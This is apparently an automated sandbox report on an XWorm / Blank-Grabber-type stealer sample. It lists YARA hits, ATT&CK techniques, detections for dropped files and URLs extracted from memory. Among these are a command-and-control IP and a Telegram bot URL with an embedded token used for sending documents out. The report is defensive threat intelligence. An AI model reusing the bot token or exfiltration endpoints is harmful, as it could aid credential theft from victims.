Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 Scheduled Task/Job	1 Access Token Manipulation	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	11 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	22 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	11 Process Injection	22 Obfuscated Files or Information	Security Account Manager	510 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Scheduled Task/Job	211 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	371 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	261 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sB2ClgrGng.exe	53%	ReversingLabs	Win64.Backdoor.Xworm
sB2ClgrGng.exe	67%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd	2%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Roaming\word.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\word.exe	80%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ip-api.com	0%	Virustotal		Browse
api.telegram.org	2%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
198.23.219.104	true
https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendDocument	false

URLs from Memory and Binaries

Name	Source	Malicious
http://logo.ver6	sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2166231720.00000281AC04B000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191095661.00000281AC069000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894131377.00000281AC066000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031560743.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2187571679.00000281AC068000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	sB2ClgrGng.exe, 00000001.00000003.1781689076.00000281ABAAD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1780927309.00000281AC123000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781524596.00000281ABAAB000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781240477.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp	false
https://www.avito.ru/	sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	false
https://api.telegram.org/bot	sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, word.exe.15.dr	true
https://github.com/Blank-c/Blank-Grabberi	sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ctrip.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Blank-c/Blank-Grabberr	sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000020.00000003.1849613191.000002224F0A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1849613191.000002224F0F4000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1829116745.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	sB2ClgrGng.exe, 00000001.00000003.1769395592.00000281AB9CC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1768908120.00000281AB9BE000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000020.00000003.1849613191.000002224F072000.00000004.00000800.00020000.00000000.sdmp	false
https://weibo.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	false
https://www.msn.com	sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC53C000.00000004.00001000.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	sB2ClgrGng.exe, 00000001.00000003.1781323039.00000281AB969000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769284741.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769626278.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1777343894.00000281AB962000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	false
https://www.reddit.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000D.00000002.1951924789.000002462EA91000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 0000000F.00000002.4216648760.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F224E91000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.ca/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB4E0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000033.00000002.1942613111.000001F226052000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1783520888.00000281ABEF8000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	false
https://httpbin.org/	sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000020.00000002.3494718781.000002224EE00000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmp	false
http://go.mic	word.exe, 00000055.00000002.2087146224.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	sB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/	sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmp	false
https://www.bbc.co.uk/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/uploadr	sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmp	false
